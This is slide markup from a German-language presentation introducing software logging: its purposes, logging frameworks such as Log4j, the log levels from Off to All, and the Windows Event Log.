              <a:t>https://www.tutorialspoint.com/log4j/log4j_logging_levels.ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>m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" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://eventlogxp.com/sshots/main.jpg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" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://de.wikipedia.org/wiki/Logdatei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" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.portent.com/images/2019/03/log-file-compressed.png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" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.codetwo.de/blog/windows-event-logs-mit-powershell-ueberpruefen-get-eventlog/6838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" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.unitechnik.com/fileadmin/_processed_/b/7/csm_Log4j-Logo_500px-Q_ddf1215372.jpg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" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.tutorialspoint.com/log4j/log4j_configuration.htm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" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://media.istockphoto.com/photos/gray-abstract-minimal-motion-backgrounds-loopable-elements-4k-picture-id1174989482?b=1&amp;k=20&amp;m=1174989482&amp;s=170667a&amp;w=0&amp;h=ld7ukW9KTzUlJLc6c37C2xs5ESYP2wLyjxsEVCumn2s=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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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58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0" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Was ist </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ogging?</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125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1416150"/>
            <a:ext cx="8520600" cy="3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erstellt automatisch Protokolle von Aktionen / Events / Fehlern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Filterung der zu protokollierenden Einträge je nach Log Level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Speicherung z.B. in Logfile, Event file, Datenbank, Konsole etc.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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server: primär Logfiles (mit Logscraper gesammelt)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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mobile Endgeräte: primär über Webservice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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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58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0" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Was ist Logging</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125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1169525"/>
            <a:ext cx="8520600" cy="4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Aufzeichnung dient zur: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de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nachvollziehbarkeit Auslösung Fehlerzustände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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wiederherstellung Versionen von Datensätzen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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aufarbeitung von Sicherheitsvorfällen → Prävention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Kann Monitoring unterstützen → Echtzeit-Analyse von Anwendungen, z.B. hinsichtlich Performance / Fehlern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Software sollte unabhängig von Logging arbeiten können, falls es ausfällt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1349" y="216550"/>
            <a:ext cx="2060299" cy="8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58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0" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anwendung und Funktionsweise</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill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1169525"/>
            <a:ext cx="8520600" cy="4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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Implementierung mithilfe von Frameworks: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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java: Log4j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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Python: Log4p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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C++: Log4cpp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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vergleichbar mit Import z.B. Scanner-Klasse in Java → Nutzung vorhandener Module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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Konfiguration z.B. programmintern möglich → setzen des  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>og </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evels (auch während runtime)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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>je nach </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>og </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evel: meldet verschiedene Fehler / Events etc. &amp; erstellt Eintrag, z.B. Aktivität user → Zeileneintrag in Logfile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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Logging im Hintergrund (unbemerkt)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2665225" y="1444950"/>
            <a:ext cx="29955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700"/>
              <a:t>C: Log4c</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-3365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700"/>
              <a:t>JavaScript: Log4js</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-3365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700"/>
              <a:t>PHP: Log4php</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5660725" y="1444950"/>
            <a:ext cx="31626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700"/>
              <a:t>Perl: Log4perl</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-3365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700"/>
              <a:t>Unix-Shells: Log4sh</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-3365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700"/>
              <a:t>Ot: Log4qt</a:t>
            </a:r>
            <a:endParaRPr sz="17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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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58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type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="71600"/>
            <a:ext cx="85206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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>og </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evels</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125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50" y="840075"/>
            <a:ext cx="8319700" cy="40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1925" y="71600"/>
            <a:ext cx="1609913" cy="6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58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type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>og </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evels</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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311700" y="1169525"/>
            <a:ext cx="8520600" cy="4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Off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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kein </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ogging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Fatal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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abbruch Programm, kritischer Fehler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Error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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ogging von Fehlern (Fortsetzung Pro-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</a:rPr>
              <a:t>gramm, Exceptions wurden abgefangen)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Warn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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sofern unerwartetes Event eintritt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8874" y="1169524"/>
            <a:ext cx="3019575" cy="37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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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58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type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>og </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evels</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Google Shape;114;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1169525"/>
            <a:ext cx="8520600" cy="4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Info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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Infos über Programmablauf (Start, Ende, Dauer, Verbindungsaufbau …)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Debug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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spezifische Informationen zum Debuggen (fehlerorientiert)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Trace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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ausführliche Debugging-Infos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All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" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ungefiltertes Logging aller Meldungen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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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58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>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="71600"/>
            <a:ext cx="8520600" cy="8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2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ogging mittels </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vent </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="de" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CC4125"/>
                </a:solidFill>
              </a:rPr>
              <a:t>og</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="CC4125"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213600" y="1171050"/>
            <a:ext cx="4358400" cy="4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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Systemlogbuch von Windows, verwendet Sammlung von </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ogfiles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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>loggt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vents: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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Netzwerkverbindungen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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>erfolglose Anmeldungsversuche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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fehler bei Start Dienst / Applikation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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fehler bei Treiber-Einrichtung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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…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4670100" y="1171050"/>
            <a:ext cx="43584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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unterscheidung Event-Quellen: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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“System” (Windows-seitige Events)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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Anwendungen” (Applikationen)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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Sicherheit” (sicherheitsrelevante Events / Fehler)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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aufrufbar z.B. über Win → “eventvwr”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de" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hier nutzbar: Log4j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7474" y="174325"/>
            <a:ext cx="2060299" cy="8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